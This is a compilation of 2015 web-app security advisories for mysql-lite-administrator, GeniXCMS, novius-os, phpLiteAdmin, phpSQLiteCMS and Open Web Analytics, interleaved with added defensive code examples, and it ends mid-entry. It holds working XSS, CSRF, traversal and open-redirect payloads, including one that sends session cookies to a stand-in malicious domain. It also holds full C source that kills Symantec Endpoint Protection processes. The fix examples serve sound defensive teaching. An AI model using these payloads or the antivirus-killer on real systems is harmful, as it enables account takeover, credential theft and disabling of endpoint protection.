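def identifier_allowed(table: str, field: str) -> bool:
    """Identifiers cannot be bound as parameters, so they must come from an allow-list."""
    return table in ALLOWED_COLUMNS and field in ALLOWED_COLUMNS[table]


def delete_bound(con, table: str, field: str, val: str) -> int:
    """Allow-listed, quoted identifiers plus a bound value. Returns rows deleted."""
    if not identifier_allowed(table, field):
        raise ValueError("unknown table or column")
    sql = 'DELETE FROM "%s" WHERE "%s" = ?' % (table, field)
    return con.execute(sql, (val,)).rowcount


if __name__ == "__main__":
    con = setup()
    print(login_concat(con, "admin", "HELL' OR '2'='2"))   # True: the OR rewrites the predicate
    print(login_bound(con, "admin", "HELL' OR '2'='2"))    # False: compared as a literal password
    print(delete_concat(setup(), "email", "CATID or 'field'='NAME'", "7"))  # 3: every row deleted
    print(identifier_allowed("email", "CATID or 'field'='NAME'"))           # False: rejected before any SQL runs
```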
mysql-lite-administrator XSS vulnerabilities
[+] Credits: hyp3rlinx
[+] Domains: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-MYSQLLITEADMINISTRATOR0621.txt

Vendor:
code.google.com/p/mysql-lite-administrator

Product:
mysql-lite-administrator(beta1)

Advisory Information:
Multiple XSS vulnerabilities

Vulnerability Details:
mysql-lite-administrator is vulnerable to XSS attacks. The application escapes injected strings, e.g. 'HELL' becomes \'HELL\', but we can easily defeat that using the Javascript functions String.charCodeAt() & String.fromCharCode().

XSS Exploit code(s):
http://localhost/mysql-lite-administrator(beta1)/tabella.php?table_name=alert(String.fromCharCode(72,69,76,76))
http://localhost/mysql-lite-administrator(beta1)/coloni.php?num_row=1&table_name=alert(666)
http://localhost/mysql-lite-administrator(beta1)/coloni.php?num_row=">alert(String.fromCharCode(72,69,76,76))
http://localhost/mysql-lite-administrator(beta1)/insert.php?table_name=alert(666)

Disclosure Timeline:
Vendor Notification: NA
June 21, 2015 : Public Disclosure

Severity Level:
Med

Description:
Request Method(s):
[+] GET
Vulnerable Product:
[+] mysql-lite-administrator (beta1)
Vulnerable Parameter(s):
[+] table_name, num_row
Affected Area(s):
[+] tabella.php & coloni.php

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.

(hyp3rlinx)
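The Symphony CMS and mysql-lite-administrator advisories both observe that the application turns 'HELL' into \'HELL\' and yet a String.fromCharCode() payload still runs; the `"/>alert(666)` probe used by several other advisories on this page exposes the same gap. The Python below is an added example, not code from either project, that models that slash-escaping and contrasts it with entity encoding for the HTML attribute context, reading the markup back through a parser to show what a browser would see. The addslashes() mimic and the `<input>` template are assumed for illustration.

```python
"""Why quote-escaping does not stop XSS: slash-escaping versus HTML entity encoding.

Added example, not code from Symphony CMS or mysql-lite-administrator. The two render functions
take the same reflected parameter; only the second encodes for the context it is written into.
"""
import html
from html.parser import HTMLParser

# Probes quoted in the advisories on this page.
PROBE_NO_QUOTES = "alert(String.fromCharCode(72,69,76,76))"   # nothing for a quote-escaper to touch
PROBE_BREAKOUT = '"/>alert(666)'                              # closes the attribute, then the tag


def addslashes(value: str) -> str:
    """Model the escaping the advisories describe (PHP addslashes()/magic-quotes style)."""
    out = []
    for ch in value:
        if ch in "'\"\\":
            out.append("\\" + ch)
        elif ch == "\0":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def render_slash_escaped(table_name: str) -> str:
    """The pattern the advisories describe: slash-escape the value, then place it in HTML."""
    return '<input name="table_name" value="%s">' % addslashes(table_name)


def render_entity_encoded(table_name: str) -> str:
    """Encode for the actual output context: an HTML double-quoted attribute."""
    return '<input name="table_name" value="%s">' % html.escape(table_name, quote=True)


class _InputReader(HTMLParser):
    """Read the markup back as a browser would: what became the attribute, what leaked out as text."""

    def __init__(self):
        super().__init__()
        self.value = None
        self.leaked = ""

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.value = dict(attrs).get("value")

    def handle_startendtag(self, tag, attrs):   # '<input ... />' form produced by the breakout
        self.handle_starttag(tag, attrs)

    def handle_data(self, data):
        self.leaked += data


def parse_back(rendered: str):
    """Return (attribute value as the browser sees it, text that escaped the attribute)."""
    reader = _InputReader()
    reader.feed(rendered)
    reader.close()
    return reader.value, reader.leaked


def contained(render, probe: str) -> bool:
    """True when the probe round-trips as plain attribute data and nothing leaks into the page."""
    value, leaked = parse_back(render(probe))
    return value == probe and leaked == ""


if __name__ == "__main__":
    print(addslashes(PROBE_NO_QUOTES) == PROBE_NO_QUOTES)        # True: the escaper changed nothing
    print(render_slash_escaped(PROBE_BREAKOUT))                   # the '\"' does not stop '/>' closing the tag
    print(parse_back(render_slash_escaped(PROBE_BREAKOUT)))       # ('\\', 'alert(666)">')
    print(parse_back(render_entity_encoded(PROBE_BREAKOUT)))      # ('"/>alert(666)', '')
```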
GeniXCMS XSS Vulnerabilities
[+] Credits: John Page ( hyp3rlinx )
[+] Domains: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-GENIXCMS0621.txt

Vendor:
=======
genixcms.org

Product:
========
GeniXCMS v0.0.3 is a PHP based content management system

Advisory Information:
=====================
Multiple persistent & reflected XSS vulnerabilities

Vulnerability Details:
======================
GeniXCMS v0.0.3 is vulnerable to persistent and reflected XSS

XSS Exploit code(s):
====================
Persistent XSS:
---------------
http://localhost/GeniXCMS-master/GeniXCMS-master/gxadmin/index.php?page=posts&act=add&token=

1- content input field: XSS injected into the content field will execute after the post is published
2- title input field: XSS injected into the title field will execute immediately

Reflected XSS:
--------------
http://localhost/GeniXCMS-master/GeniXCMS-master/gxadmin/index.php?page=posts&q=1'alert('XSS By Hyp3rlinx')

Disclosure Timeline:
====================
Vendor Notification: NA
June 21, 2015 : Public Disclosure

Severity Level:
===============
Med

Description:
============
Request Method(s):
[+] GET & POST

Vulnerable Product:
[+] GeniXCMS 0.0.3

Vulnerable Parameter(s):
[+] q, content & title

Affected Area(s):
[+] index.php
novius-os.5.0.1 Persistent XSS, LFI & Open Redirect Vulnerabilities
[+] Credits: John Page ( hyp3rlinx )
[+] Domains: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-NOVIUSOS0629.txt

Vendor:
=======
community.novius-os.org

Product:
========
novius-os.5.0.1-elche is a PHP Based Content Management System
community.novius-os.org/developpers/download.html

Advisory Information:
=====================
Persistent XSS, LFI & Open Redirect

Vulnerability Details:
======================
Persistent XSS:
---------------
Users can inject XSS payloads that will be saved to the MySQL DB, where they will execute each time they are accessed.

1- In Admin under 'Media Center' users can inject XSS payloads and save them to the 'media_title' field of a saved media file: create a new media page, inject the payload, click save and then select visualize.
2- Under the Website menus area users can inject XSS payloads and save them to the 'menu_title' field of a Website menu.

If we view the browser source code at http://localhost/novius-os.5.0.1-elche/novius-os/?_preview the XSS is output as HTML entities, e.g.
But within the same webpage, for the tag, you can see it is not, e.g.
alert('HELL')

Local File Inclusion:
---------------------
We can directory traverse to access and read files outside of the current working directory in the Admin area by abusing the 'tab' parameter.
http://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=../../../../

Open Redirect:
--------------
http://localhost/novius-os.5.0.1-elche/novius-os/admin/nos/login?redirect= is open to abuse by supplying a malicious location or file.

XSS Exploit code(s):
====================
In 'Media Center' create a new media file, click edit, inject the XSS payload into the 'title' field, click save and then select visualize.
http://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=admin/noviusos_media/media/insert_update/1
vulnerable parameter: media_title

In 'Website Menu' create a new website menu item, inject the XSS payload, click save and then select visualize.
http://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=admin/noviusos_menu/menu/crud/insert_update%3Fcontext%3Dmain%253A%253Aen_GB
http://localhost/novius-os.5.0.1-elche/novius-os/?_preview=1
vulnerable parameter: menu_title

LFI:
----
http://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=../../../SENSITIVE-FILE.txt
http://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=../../../../xampp/phpinfo.php

Open Redirect:
--------------
http://localhost/novius-os.5.0.1-elche/novius-os/admin/nos/login?redirect=http://www.SATANSBRONZEBABYSHOES.com

Disclosure Timeline:
====================
Vendor Notification: NA
June 29, 2015 : Public Disclosure

Severity Level:
===============
Med

Description:
============
Request Method(s):
[+] GET & POST

Vulnerable Product:
[+] novius-os.5.0.1-elche

Vulnerable Parameter(s):
[+] media_title, menu_title, tab, redirect

Affected Area(s):
[+] Login, Web Pages, Media Center & Website Menu area
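Server-side validation for the two parameters this advisory abuses, 'tab' and 'redirect', as an added example that is not novius-os code. The route grammar for 'tab', the template base directory and the trusted host name are assumptions for the demonstration; the inputs are modelled on the advisory's own URLs. Requires PHP 8 for str_starts_with().

```php
<?php
// Added example, not novius-os code: validating 'tab' (a route/template
// selector) and 'redirect' (the post-login destination).  The route grammar,
// base directory and trusted host are assumptions for the demonstration.

const TAB_BASE_DIR = '/var/www/app/views';      // assumed location of tab templates
const TRUSTED_HOST = 'cms.example.test';        // assumed host of this site

// Accept only a strict allowlist grammar for the route part of 'tab':
// slash-separated identifiers of letters, digits and underscore, optionally
// followed by a query string.  "." is not in the character class, so "..",
// "....//" and similar variants are refused before the value reaches
// include() or any filesystem call.
function tab_route(string $tab): ?string
{
    [$route] = explode('?', $tab, 2);
    if (!preg_match('#\A[A-Za-z0-9_]+(?:/[A-Za-z0-9_]+)*\z#', $route)) {
        return null;
    }
    return $route;
}

// Second, independent layer: map the route to a file and confirm that the
// resolved path still lies under the base directory.  realpath() resolves
// "..", "." and symlinks; the trailing separator in the prefix test stops
// "/var/www/app/views2" from passing as a child of "/var/www/app/views".
function tab_template_path(string $tab): ?string
{
    $route = tab_route($tab);
    if ($route === null) {
        return null;
    }
    $base = realpath(TAB_BASE_DIR);
    $file = realpath(TAB_BASE_DIR . '/' . $route . '.php');
    if ($base === false || $file === false) {
        return null;                      // unknown template or base missing
    }
    return str_starts_with($file, $base . DIRECTORY_SEPARATOR) ? $file : null;
}

// Post-login redirect: allow a local absolute path (one leading "/", not
// "//" or "/\", which browsers read as a scheme-relative URL to another
// host) or an http(s) URL on the trusted host; anything else falls back to
// a fixed default.
function safe_redirect_target(string $redirect, string $default = '/admin/'): string
{
    $redirect = trim($redirect);
    if ($redirect === '') {
        return $default;
    }
    if ($redirect[0] === '/') {
        return preg_match('#\A/[/\\\\]#', $redirect) ? $default : $redirect;
    }
    $parts = parse_url($redirect);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return $default;                  // javascript:, data:, relative junk
    }
    $schemeOk = in_array(strtolower($parts['scheme']), ['http', 'https'], true);
    $hostOk   = strcasecmp($parts['host'], TRUSTED_HOST) === 0;
    return ($schemeOk && $hostOk) ? $redirect : $default;
}

// Constructed inputs modelled on the advisory's URLs.
$tabs = [
    'admin/noviusos_media/media/insert_update/1',
    'admin/noviusos_menu/menu/crud/insert_update?context=main::en_GB',
    '../../../../xampp/phpinfo.php',
    '....//....//etc/passwd',
];
foreach ($tabs as $t) {
    printf("tab %-64s -> %s\n", $t, tab_route($t) ?? 'REJECTED');
}

$redirects = [
    '/admin/',
    'https://cms.example.test/admin/?tab=dashboard',
    'http://www.SATANSBRONZEBABYSHOES.com',
    '//evil.example/phish',
    'javascript:alert(1)',
];
foreach ($redirects as $r) {
    printf("redirect %-48s -> %s\n", $r, safe_redirect_target($r));
}
```

The allowlist check is the one that matters; the realpath() prefix test is a second layer for the case where a route is later mapped to a file by code that the allowlist does not guard. For the redirect, the default-on-doubt shape is deliberate: a login form that cannot validate its return target should land the user on a fixed page rather than pass the raw parameter through.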
phpLiteAdmin v1.1 CSRF & XSS Vulnerabilities
[+] Credits: John Page ( hyp3rlinx )
[+] Domains: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-PHPLITEADMIN0705.txt

Vendor:
=======
bitbucket.org/phpliteadmin

Product:
========
phpLiteAdmin v1.1

Advisory Information:
=====================
CSRF & XSS Vulnerabilities

Vulnerability Details:
======================
CSRF:
-----
No CSRF token exists when making calls to various SQL operations, therefore we can get a user to drop whole database tables if they click on our malicious link and the table name is known.

XSS:
----
There are three XSS vulnerabilities I point out: the first is the use of 'PHP_SELF', the second is an unsanitized parameter for the SQL statement when calling the drop table method, e.g. 'http://localhost/phpliteadmin.php?droptable=[XSS]', and the third is an unsanitized 'table' parameter, e.g. 'http://localhost/phpliteadmin_v1-1/phpliteadmin.php?table=[XSS]'

Let's look at the first one more in depth, as it's more fun.

phpliteadmin uses the PHP reserved server variable $_SERVER['PHP_SELF'], which is vulnerable if not used correctly, allowing us to inject an XSS payload to steal session cookies and navigate users to a place of our choosing in order to cause mayhem.

On line 32 of 'phpliteadmin.php' we find the vulnerable code:

//build the basename of this file
$nameArr = explode("?", $_SERVER['PHP_SELF']);
$thisName = $nameArr[0];
$nameArr = explode("/", $thisName);
$thisName = $nameArr[sizeof($nameArr)-1];

//constants
define("VERSION", "1.1");
define("PAGE", $thisName);

In the PHP docs we find the following explanation of 'PHP_SELF':
"The filename of the currently executing script, relative to the document root."
ref: http://php.net/manual/en/reserved.variables.server.php

It is known that $_SERVER['PHP_SELF'] can make your application insecure, as we can inject code following a forward slash "/". But we have a slight problem to overcome: we can execute code, but our forward slashes will not be processed correctly and the exploit will FAIL!, leaving us with the following useless URL instead of taking the victim to a domain of our choice.

Failed exploit example:
http://localhost/phpliteadmin_v1-1/phpliteadmin.php/";'onMouseOver="window.open('http://hyp3rlinx.altervista.org')"

Failed Result:
http://localhost/phpliteadmin_v1-1/phpliteadmin.php/hyp3rlinx.altervista.org

But all is NOT lost! We will construct the forward slashes of our malicious URL inside our JS call to the window.open() method, using String.fromCharCode(58) for ':' and String.fromCharCode(47) for '/', which will NOW give us what we seek: control over the user's browser, taking them to some terrible dark place.

Bypass $_SERVER['PHP_SELF'] forward slash '//' processing issue:

Tada! Our successful XSS exploit:
http://localhost/phpliteadmin_v1-1/phpliteadmin.php/";'onMouseOver="(function(){var x='http';x+=String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+'hyp3rlinx.altervista.org';window.open(x);})()"

Exploit code(s):
================
XSS(s) POC:
-----------
1- $_SERVER['PHP_SELF'] XSS exploit steals the current admin session cookie and sends it to a remote server:
http://localhost/phpliteadmin_v1-1/phpliteadmin.php/";'onMouseOver="(function(){var x='http';x+=String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+'MALICIOUS-DOMAIN';window.open(x+String.fromCharCode(47)+'cookietheft.php'+String.fromCharCode(63)+'='+document.cookie);})()"

2- SQL droptable XSS:
http://localhost/sectest/phpliteadmin_v1-1/phpliteadmin.php?droptable=alert(666)

3- SQL table XSS:
http://localhost/phpliteadmin_v1-1/phpliteadmin.php?table="/>alert(666)

CSRF POC:
---------
Drop tables:
localhost/phpliteadmin_v1-1/phpliteadmin.php?droptable=mytable&confirm=1

Disclosure Timeline:
====================
Vendor Notification: NA
July 5, 2015 : Public Disclosure

Severity Level:
===============
Med

Description:
============
Request Method(s):
[+] GET

Vulnerable Product:
[+] phpliteadmin_v1-1

Vulnerable Parameter(s):
[+] $_SERVER['PHP_SELF'], droptable, table

Affected Area(s):
[+] Admin
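The PHP_SELF problem the advisory walks through, from the fixing side. This is an added example and not phpLiteAdmin's code: the quoted page-name derivation reproduced as a function of the PHP_SELF string, a derivation from SCRIPT_NAME that the request path cannot influence, and the attribute encoding that must wrap the value wherever it is echoed (the same encoding answers the 'droptable' and 'table' reflections). The request values are constructed to match the advisory's injection point; function names are assumptions.

```php
<?php
// Added example, not phpLiteAdmin code.  Names are assumptions.

// As quoted in the advisory: the last "/"-separated segment of PHP_SELF.
// PHP_SELF includes PATH_INFO, so for /phpliteadmin.php/<anything> the
// "page name" is whatever followed the script name.  That is why the
// payload lands in PAGE, and why a "/" inside the payload truncates it.
function page_name_from_php_self(string $phpSelf): string
{
    $nameArr  = explode('?', $phpSelf);
    $thisName = $nameArr[0];
    $nameArr  = explode('/', $thisName);
    return $nameArr[count($nameArr) - 1];
}

// Safer derivation: SCRIPT_NAME is the path of the script the server
// actually executed, without PATH_INFO or the query string; basename of
// __FILE__ needs no request data at all.  The value is passed in so the
// function can be exercised outside a web request.
function page_name_from_script_name(string $scriptName): string
{
    return basename($scriptName);
}

// Whatever the source, the value is attacker-influenced data once it meets
// HTML; encode it for the attribute context it is written into.
function form_open_tag(string $page): string
{
    return '<form action="' . htmlspecialchars($page, ENT_QUOTES, 'UTF-8') . '" method="post">';
}

// Constructed $_SERVER values for a request to
//   /phpliteadmin_v1-1/phpliteadmin.php/";'onMouseOver="alert(1)"
// (the advisory's injection point, with a harmless handler body).
$phpSelf    = '/phpliteadmin_v1-1/phpliteadmin.php/";\'onMouseOver="alert(1)"';
$scriptName = '/phpliteadmin_v1-1/phpliteadmin.php';

$vulnPage = page_name_from_php_self($phpSelf);
$safePage = page_name_from_script_name($scriptName);

echo "PHP_SELF derivation:    ", $vulnPage, PHP_EOL;
echo "SCRIPT_NAME derivation: ", $safePage, PHP_EOL;
echo "raw echo (vulnerable):  <form action=\"", $vulnPage, "\" method=\"post\">", PHP_EOL;
echo "encoded:                ", form_open_tag($vulnPage), PHP_EOL;
```

Two separate fixes are shown because they fail independently: switching to SCRIPT_NAME removes the attacker's control over the value, and encoding on output protects every other place the page name (or any request-derived string) is written into markup.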
Symantec EP 12.1.4013 Disabling Vulnerability
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SMC_EXE "Smc.exe"
#define SMC_GUI "SmcGui.exe"
#define CC_SVC_HST "ccSvcHst.exe"

/*
By John Page (hyp3rlinx) - Dec 2014 - hyp3rlinx.altervista.org
Symantec Endpoint Protection version 12.1.4013
First reported to Symantec - Jan 20, 2015

Goal: Kill Symantec EP agent & services after globally locking down endpoint protection
via the Symantec central management server and enabling globally managed password
protection controls.

Tested successfully on Windows 7 SP1, result may vary OS to OS.

Scenario: Run from browser upon download, or save to some directory and run.
Not the most elegant code and I don't care...
*/

int SetDebugPrivileges(void);   /* defined after main(); prototype so the call in main() compiles */

/* Walk a process snapshot and terminate every process whose image name matches victimo */
void el_crookedio_crosso(const char *victimo){
    HANDLE hSnapShot=CreateToolhelp32Snapshot(TH32CS_SNAPALL,0);
    PROCESSENTRY32 pEntry;
    pEntry.dwSize=sizeof(pEntry);
    BOOL hRes=Process32First(hSnapShot,&pEntry);
    while(hRes){
        if(strcmp(pEntry.szExeFile,victimo)==0){
            HANDLE hProcess=OpenProcess(PROCESS_TERMINATE,0,(DWORD)pEntry.th32ProcessID);
            if (hProcess!=NULL){
                TerminateProcess(hProcess,9);
                CloseHandle(hProcess);
            }
        }
        hRes=Process32Next(hSnapShot,&pEntry);
    }
    CloseHandle(hSnapShot);
}

/* Return the PID of the first process whose image name matches ghostofsin, or 0 if none */
DWORD exeo_de_pid(char *ghostofsin){
    DWORD ret=0;
    PROCESSENTRY32 pe32={sizeof (PROCESSENTRY32)};
    HANDLE hProcSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
    if (hProcSnap==INVALID_HANDLE_VALUE) return 0;
    if (Process32First (hProcSnap,&pe32))
        do
            if (!strcmp(pe32.szExeFile,ghostofsin)) {
                ret=pe32.th32ProcessID;
                break;
            }
        while (Process32Next (hProcSnap,&pe32));
    CloseHandle (hProcSnap);
    return ret;
}

void angelo_maliciouso(){
    int AV=exeo_de_pid(SMC_EXE);
    char id[8];
    sprintf(id, "%d ", AV);
    printf("%s", id);
    char cmd[50]="Taskkill /F /PID ";
    strcat(cmd, id);
    system(cmd);
    // system("Taskkill /F /IM Smc.exe"); //Access denied.
    system("\"C:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection\\Smc.exe\" -disable -ntp");
    Sleep(1000);
    el_crookedio_crosso(SMC_EXE);
    el_crookedio_crosso(SMC_GUI);
    el_crookedio_crosso(CC_SVC_HST);
}

int main(void){
    puts("/*---*/\n");
    puts("| EXORCIST DE SYMANTEC Antivirus version 12.1.4013|\n");
    puts("| By hyp3rlinx - Jan 2015|\n");
    puts("/**/\n");
    SetDebugPrivileges();
    angelo_maliciouso();
    Sleep(1000);
    el_crookedio_crosso(SMC_EXE);
    el_crookedio_crosso(SMC_GUI);
    el_crookedio_crosso(CC_SVC_HST);
    Sleep(2000);
    angelo_maliciouso();
    Sleep(6000);
    return 0;
}

/* Enable SeDebugPrivilege on the current process token; returns 0 on success or a Win32 error code */
int SetDebugPrivileges(){
    DWORD err=0;
    TOKEN_PRIVILEGES Debug_Privileges;
    if(!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&Debug_Privileges.Privileges[0].Luid))return GetLastError();
    HANDLE hToken=0;
    if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken)){
        err=GetLastError();
        if(hToken)CloseHandle(hToken);
        return err;
    }
    Debug_Privileges.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
    Debug_Privileges.PrivilegeCount=1;
    if(!AdjustTokenPrivileges(hToken,FALSE,&Debug_Privileges,0,NULL,NULL)){
        err=GetLastError();
        if(hToken) CloseHandle(hToken);
    }
    return err;
}
phpSQLiteCMS CSRF, Unrestricted File Type Upload, Privilege Escalation & XSS
[+] Credits: John Page ( hyp3rlinx )
[+] Domains: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-PHPSQLITECMS0712.txt

Vendor:
=======
phpsqlitecms.net

Product:
========
ilosuna-phpsqlitecms-d9b8219

Advisory Information:
=====================
CSRF, Unrestricted File type upload, Privilege escalation & XSS Vulnerabilities.
Users will be affected if they visit a malicious website or click any infected link, possibly resulting in malicious attackers taking control of the Admin / CMS area.

Vulnerability Details:
======================
CSRF:
-----
We can add arbitrary users to the system, delete arbitrary web server files and escalate privileges, as no CSRF token is present.

Add arbitrary user:
-------------------
The following request variables are all that is needed to add users to the system.

mode = users
new_user_submitted = true
name = "hyp3rlinx"
pw = "12345"
pw_r = "12345"

Privilege escalation:
---------------------
Under the users area in admin we can easily gain admin privileges: again using the CSRF vulnerability, we submit the form using our id and change the request variable 'type' to '1', granting us admin privileges. e.g.

mode:users
edit_user_submitted:true
id:3
name:hyp3rlinx
new_pw:
new_pw_r:
type:1   <-- make us admin

Delete arbitrary files:
-----------------------
The following request parameters are all that is needed to delete files from the media or files directories under the web server's CMS area.

mode=filemanager
directory=files
delete=index.html
confirmed=true

XSS:
----
We can steal the PHP session cookie via the XSS vulnerability.

Unrestricted File Type Upload:
------------------------------
The files & media dirs will happily take .PHP, .EXE etc... and PHP scripts, when selected, will execute whatever PHP script we upload.

Exploit code(s):
================
1- CSRF POC
Add arbitrary users to the system.

function doit(){
    var e=document.getElementById('evil')
    e.submit()
}

http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php"; method="post">

2- CSRF privilege escalation POST URL:
--------------------------------------
http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php

Privilege escalation request string:
mode=users&edit_user_submitted=true&id=3&name=hyp3rlinx&new_pw=&new_pw_r=&type=1

3- CSRF Delete Arbitrary Server Files:
--------------------------------------
The request URL below will delete the index.html file in the files dir on the web server without any type of request validation, CSRF token etc.
http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php?mode=filemanager&directory=files&delete=index.html&confirmed=true

XSS steal PHP session ID POC:
-----------------------------
http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php?mode=comments&type=0&edit=49&comment_id="/>alert('XSS by hyp3rlinx '%2bdocument.cookie)&page=1

Disclosure Timeline:
====================
Vendor Notification: NA
July 12, 2015 : Public Disclosure

Severity Level:
===============
High

Description:
============
Request Method(s):
[+] POST & GET

Vulnerable Product:
[+] ilosuna-phpsqlitecms-d9b8219

Vulnerable Parameter(s):
[+] comment_id, delete, type, new_user_submitted

Affected Area(s):
[+] Admin & CMS
Open-Web-Analytics-1.5.7 Cryptographic, Password Disclosure & XSS Vulnerabilities
[+] Credits: John Page ( hyp3rlinx )
[+] Domains: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-OPENWEBANALYTICS0721.txt

Vendor:
=======
www.openwebanalytics.com

Product:
========
Open-Web-Analytics-1.5.7

Advisory Information:
=====================
Cryptographic, Password Disclosure & XSS Vulnerabilities

Vulnerability Details:
======================
Cryptographic Weakness:
-----------------------
Passwords are stored in the database using the MD5 hash algorithm, NON salted. In owa_lib.php we find:

public static function encryptPassword($password) {
    return md5(strtolower($password).strlen($password));
}

Password Disclosure:
--------------------
In owa_auth.php on line 329 we find the saveCredentials() PHP function, which saves the username & password as browser domain cookies, leaving us direct access via an XSS attack.

function saveCredentials() {
    $this->e->debug('saving user credentials to cookies');
    setcookie($this->config['ns'].'u', $this->u->get('user_id'), time()+3600*24*365*10, '/', $this->config['cookie_domain']);
    setcookie($this->config['ns'].'p', $this->u->get('password'), time()+3600*24*30, '/', $this->config['cookie_domain']);
}

XSS:
----
The application is vulnerable to XSS. So, now we can access the Admin username & password credentials from our XSS attack, do a window.open() or whatever and send them to a remote server, then come back and login after performing an offline crack of the hash.

Since we cannot seem to echo the password using document.cookie, we will use window.document['cookie'] to gain access to the admin password.

The application uses the admin username and password as persistent browser cookies, which is our dream come true!

e.g. retrieved username & passwd via XSS ( owa_u=admin; owa_p=76ffbb8d470d6a402b3c429f35be8a1a )
user: admin / passwd: abc123

A second XSS vector also exists in the Install PHP script, via a POST request in the Email address field.

Exploit code(s):
================
XSS(s) POC:
-----------
1- Steal username & password XSS; in this example we inject our malicious payload into the middle of the site ID hash.
http://localhost/Open-Web-Analytics-1.5.7/Open-Web-Analytics-1.5.7/index.php?owa_do=base.sitesInvocation&owa_siteId=e9144cf4%22/%3E%22--%3E%3CDIV%20id=%27HELL%27%20onMouseMove=alert%28window.document[%27cookie%27]%29;%3C!--

Injecting
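The two quoted functions, encryptPassword() and saveCredentials(), beside what replaces them, as an added example that is not Open Web Analytics code: a salted slow hash through password_hash(), and a server-side session keyed by a random identifier that is the only value handed to the browser, marked HttpOnly so the advisory's document.cookie read returns nothing useful. The session store and all names are assumptions; the cookie is returned rather than sent so the script runs outside a web request. Requires PHP 7.3 or later for the setcookie() options array.

```php
<?php
// Added example, not Open Web Analytics code.  Names and the in-memory
// session store are assumptions for the demonstration.

// The quoted scheme: identical output for 'abc123' and 'ABC123', no salt,
// one fast MD5 round, so a leaked value is crackable offline at MD5 speed.
function legacy_encrypt_password(string $password): string
{
    return md5(strtolower($password) . strlen($password));
}

// password_hash() stores algorithm, cost and a random per-password salt in
// its result; password_verify() reads them back, so no salt column is needed.
function hash_password(string $password): string
{
    return password_hash($password, PASSWORD_DEFAULT);
}

function verify_password(string $password, string $stored): bool
{
    return password_verify($password, $stored);
}

// Replacement for saveCredentials(): keep the authenticated state on the
// server and hand the browser only a random session id.  HttpOnly keeps it
// out of document.cookie, Secure keeps it off plaintext HTTP, SameSite
// limits cross-site sending.  The password hash never leaves the server.
function issue_session(array &$store, int $userId): array
{
    $sid = bin2hex(random_bytes(32));
    $store[$sid] = ['user_id' => $userId, 'created' => time()];
    return [
        'name'    => 'owa_session',
        'value'   => $sid,
        'options' => [
            'expires'  => time() + 8 * 3600,   // hours, not the quoted ten years
            'path'     => '/',
            'secure'   => true,
            'httponly' => true,
            'samesite' => 'Lax',
        ],
    ];
}

function user_for_session(array $store, string $sid): ?int
{
    return $store[$sid]['user_id'] ?? null;
}

// Constructed walk-through.
$stored = hash_password('abc123');
printf("legacy hashes equal for abc123 and ABC123: %s\n",
    legacy_encrypt_password('abc123') === legacy_encrypt_password('ABC123') ? 'yes' : 'no');
printf("password_verify('abc123'): %s\n", verify_password('abc123', $stored) ? 'ok' : 'fail');
printf("password_verify('ABC123'): %s\n", verify_password('ABC123', $stored) ? 'ok' : 'fail');

$store  = [];
$cookie = issue_session($store, 1);
// In a request handler: setcookie($cookie['name'], $cookie['value'], $cookie['options']);
printf("cookie value is a %d-character random id, no user id or hash\n", strlen($cookie['value']));
printf("session resolves to user: %s\n", var_export(user_for_session($store, $cookie['value']), true));
```

The case-folding line in the quoted scheme is worth noticing on its own: it shrinks the password space before hashing, and the length suffix adds nothing an attacker does not already know from the candidate being tried.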
Hawkeye-G v3.0.1.4912 CSRF Vulnerability CVE-2015-2878
[+] Credits: John Page ( hyp3rlinx )
[+] Domains: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-HAWKEYEG0724.txt

Vulnerability Type:
===================
CSRF

CVE Reference:
==============
CVE-2015-2878

Vendor:
=======
www.hexiscyber.com

Product:
========
Hawkeye-G v3.0.1.4912
Hawkeye G is an active defense disruptive technology that detects, investigates, remediates and removes cyber threats within the network.

Advisory Information:
=====================
Multiple CSRF Vulnerabilities

Vulnerability Details:
======================
1- CSRF Add arbitrary accounts to the system
vulnerable URL: https://localhost:8443/interface/rest/accounts/json
vulnerable POST parameter: 'name'

2- CSRF modification of network sensor settings
a) Turn off 'Url matching' Sensor
b) Turn off 'DNS Inject' Sensor
c) Turn off 'IP Redirect' Sensor
vulnerable URL: https://localhost:8443/interface/rest/dpi/setEnabled/1
vulnerable POST parameters: 'url_match' 'dns_inject' 'ip_redirect'

3- CSRF whitelisting of malware MD5 hash IDs
vulnerable URL: https://localhost:8443/interface/rest/md5-threats/whitelist
vulnerable POST parameter: 'id'

CSRF Exploit code(s):
=====================
/* Execute consecutive CSRF exploits */
